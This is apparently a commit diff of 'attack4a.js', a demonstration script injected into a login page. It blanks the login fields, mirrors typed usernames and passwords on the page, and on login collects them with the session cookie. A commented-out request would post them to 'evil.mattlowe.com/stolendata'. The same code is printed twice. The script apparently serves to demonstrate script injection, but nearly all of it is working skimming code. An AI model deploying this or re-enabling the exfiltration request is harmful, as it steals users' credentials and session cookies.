mattlowe · April 26, 2018 11:16
diff --git a/attack4a.js b/attack4a.js

 if (document.attachEvent ? document.readyState === "complete" : document.readyState !== "loading"){
 	pageisdone();
 } else {
 	document.addEventListener('DOMContentLoaded', pageisdone);
 }

 clearItems()
 function clearItems() {
 	var rerun = false;
 	var myel=document.querySelector("div#loginbox table tbody tr td input.textinput");
 	console.log(1,myel);
 	if (myel == null) {
 		rerun = true;
 	}else{
 		myel.value = "";
 	}
 	var myel=document.querySelector("div#loginbox table tbody tr:nth-child(3n) td input.textinput");
 	console.log(2,myel);
 	if (myel == null) {
 		rerun = true;
 	}else{
 		myel.value = "";
 	}
 	var myel=document.querySelector("div#msgbox table tbody tr td span");
 	console.log(3,myel);
 	if (myel == null) {
 		rerun = true;
 	}else{
 		myel.innerHTML = "";
 	}
 	if (rerun) {
 		console.log("reclear");
 		setTimeout(clearItems,.5);
 	}
 }

 function pageisdone() {
 	// Hide the error message about a failed login.
 	document.querySelector("div#msgbox table tbody tr td span").innerHTML = "";

 	// Add an awesome background for the page.
 	var img = new Image();
 	img.src = "data:image/svg+xml;base64," + window.btoa('<svg enable-background="new 0 0 469 216" version="1.1" viewBox="0 0 469 216" xmlns="http://www.w3.org/2000/svg"><g fill="#383A35" opacity=".4"><path d="m138.5 66.6h33.9c19.8 0 31.8 11.7 31.8 28.7v0.2c0 19.2-14.9 29.2-33.5 29.2h-13.9v24.9h-18.3v-83zm32.7 41.8c9.1 0 14.5-5.5 14.5-12.6v-0.2c0-8.2-5.7-12.6-14.8-12.6h-14.1v25.4h14.4z"/><path d="M248.9,83.4h-25.2V66.6h68.7v16.8h-25.2v66.1h-18.2V83.4z"/><path d="m321.4 66.6h18.2v83h-18.2v-83z"/><path d="M367.5,66.6h20.1l21.7,58.4L431,66.6h19.7l-33.5,83.6H401L367.5,66.6z"/><path d="m70.3 65c-23.7 0-43 19.3-43 43s19.3 43 43 43 43-19.3 43-43-19.3-43-43-43zm0 68.2c-13.9 0-25.2-11.3-25.2-25.2s11.3-25.2 25.2-25.2 25.2 11.3 25.2 25.2c-0.1 13.9-11.3 25.2-25.2 25.2z"/></g><path fill="#0055B8" opacity=".4" class="st1" d="m70.3 167.7c-21.1 0-38.6 15.2-42.3 35.2h18.4c3.3-10.1 12.8-17.4 23.9-17.4 11.2 0 20.6 7.3 23.9 17.4h18.4c-3.7-20-21.3-35.2-42.3-35.2z"/><path fill="#7DAED3" opacity=".4" class="st2" d="m70.3 48.3c21.1 0 38.6-15.2 42.3-35.2h-18.4c-3.3 10.1-12.8 17.4-23.9 17.4-11.2 0-20.6-7.3-23.9-17.4h-18.4c3.7 20 21.2 35.2 42.3 35.2z"/></svg>');
 	document.querySelector("#banner").style.backgroundRepeat='no-repeat'
 	document.querySelector("#banner").style.backgroundImage="url('" + img.src + "')";


 	if (!document.querySelector("#aOut")) {
 		var out=document.createElement('td');
 		out.id = "aOut";
 		out.innerHTML="<h4>The following data would be posted to the attacker's server:</h4><p><b>Username:</b> <span class='usern'></span></p><p><b>Password:</b> <span class='passw'></span></p>"
 		var outr=document.createElement('tr');
 		document.querySelector("#msgbox table tbody").appendChild(outr);
 		outr.appendChild(out);
 	}

 	var lb=document.querySelector("div#loginbox table tbody tr td input.textinput");
 	lb.value = "";
 	lb.addEventListener("keyup",
 		function (argument) {
 			document.querySelector("#aOut span.usern").innerText=lb.value
 		}
 	);
 	var lp=document.querySelector("div#loginbox table tbody tr:nth-child(3n) td input.textinput")
 	lp.value = "";
 	lp.addEventListener("keyup",
 		function (argument) {
 			document.querySelector("#aOut span.passw").innerText=lp.value
 		}
 	);

 	document.querySelector("div#loginmenu table tbody tr td table tbody tr td div.btn_trans_m a").addEventListener("click",
 		function (argument) {
 			var data = {};
 			data.cookie = document.cookie
 			data.user = lb.value;
 			data.pass = lp.value;

 			alert("The following data will be posted to an attacker controlled page:" + "\n\nUser: " + data.user + "\n\nPass: " + data.pass + "\n\nCookie: " + data.cookie)

 			// var request = new XMLHttpRequest();
 			// request.open('POST', 'https://evil.mattlowe.com/stolendata', false);
 			// request.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8');
 			// request.send(data);

 			alert("Now allowing the page to login as normal...")
 			// document.location = "/";
 		}
 	);
 }

	if (document.attachEvent ? document.readyState === "complete" : document.readyState !== "loading"){
	pageisdone();
	} else {
	document.addEventListener('DOMContentLoaded', pageisdone);
	}

	clearItems()
	function clearItems() {
	var rerun = false;
	var myel=document.querySelector("div#loginbox table tbody tr td input.textinput");
	console.log(1,myel);
	if (myel == null) {
	rerun = true;
	}else{
	myel.value = "";
	}
	var myel=document.querySelector("div#loginbox table tbody tr:nth-child(3n) td input.textinput");
	console.log(2,myel);
	if (myel == null) {
	rerun = true;
	}else{
	myel.value = "";
	}
	var myel=document.querySelector("div#msgbox table tbody tr td span");
	console.log(3,myel);
	if (myel == null) {
	rerun = true;
	}else{
	myel.innerHTML = "";
	}
	if (rerun) {
	console.log("reclear");
	setTimeout(clearItems,.5);
	}
	}

	function pageisdone() {
	// Hide the error message about a failed login.
	document.querySelector("div#msgbox table tbody tr td span").innerHTML = "";

	// Add an awesome background for the page.
	var img = new Image();
	img.src = "data:image/svg+xml;base64," + window.btoa('<svg enable-background="new 0 0 469 216" version="1.1" viewBox="0 0 469 216" xmlns="http://www.w3.org/2000/svg"><g fill="#383A35" opacity=".4"><path d="m138.5 66.6h33.9c19.8 0 31.8 11.7 31.8 28.7v0.2c0 19.2-14.9 29.2-33.5 29.2h-13.9v24.9h-18.3v-83zm32.7 41.8c9.1 0 14.5-5.5 14.5-12.6v-0.2c0-8.2-5.7-12.6-14.8-12.6h-14.1v25.4h14.4z"/><path d="M248.9,83.4h-25.2V66.6h68.7v16.8h-25.2v66.1h-18.2V83.4z"/><path d="m321.4 66.6h18.2v83h-18.2v-83z"/><path d="M367.5,66.6h20.1l21.7,58.4L431,66.6h19.7l-33.5,83.6H401L367.5,66.6z"/><path d="m70.3 65c-23.7 0-43 19.3-43 43s19.3 43 43 43 43-19.3 43-43-19.3-43-43-43zm0 68.2c-13.9 0-25.2-11.3-25.2-25.2s11.3-25.2 25.2-25.2 25.2 11.3 25.2 25.2c-0.1 13.9-11.3 25.2-25.2 25.2z"/></g><path fill="#0055B8" opacity=".4" class="st1" d="m70.3 167.7c-21.1 0-38.6 15.2-42.3 35.2h18.4c3.3-10.1 12.8-17.4 23.9-17.4 11.2 0 20.6 7.3 23.9 17.4h18.4c-3.7-20-21.3-35.2-42.3-35.2z"/><path fill="#7DAED3" opacity=".4" class="st2" d="m70.3 48.3c21.1 0 38.6-15.2 42.3-35.2h-18.4c-3.3 10.1-12.8 17.4-23.9 17.4-11.2 0-20.6-7.3-23.9-17.4h-18.4c3.7 20 21.2 35.2 42.3 35.2z"/></svg>');
	document.querySelector("#banner").style.backgroundRepeat='no-repeat'
	document.querySelector("#banner").style.backgroundImage="url('" + img.src + "')";


	if (!document.querySelector("#aOut")) {
	var out=document.createElement('td');
	out.id = "aOut";
	out.innerHTML="<h4>The following data would be posted to the attacker's server:</h4><p><b>Username:</b> <span class='usern'></span></p><p><b>Password:</b> <span class='passw'></span></p>"
	var outr=document.createElement('tr');
	document.querySelector("#msgbox table tbody").appendChild(outr);
	outr.appendChild(out);
	}

	var lb=document.querySelector("div#loginbox table tbody tr td input.textinput");
	lb.value = "";
	lb.addEventListener("keyup",
	function (argument) {
	document.querySelector("#aOut span.usern").innerText=lb.value
	}
	);
	var lp=document.querySelector("div#loginbox table tbody tr:nth-child(3n) td input.textinput")
	lp.value = "";
	lp.addEventListener("keyup",
	function (argument) {
	document.querySelector("#aOut span.passw").innerText=lp.value
	}
	);

	document.querySelector("div#loginmenu table tbody tr td table tbody tr td div.btn_trans_m a").addEventListener("click",
	function (argument) {
	var data = {};
	data.cookie = document.cookie
	data.user = lb.value;
	data.pass = lp.value;

	alert("The following data will be posted to an attacker controlled page:" + "\n\nUser: " + data.user + "\n\nPass: " + data.pass + "\n\nCookie: " + data.cookie)

	// var request = new XMLHttpRequest();
	// request.open('POST', 'https://evil.mattlowe.com/stolendata', false);
	// request.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8');
	// request.send(data);

	alert("Now allowing the page to login as normal...")
	// document.location = "/";
	}
	);
	}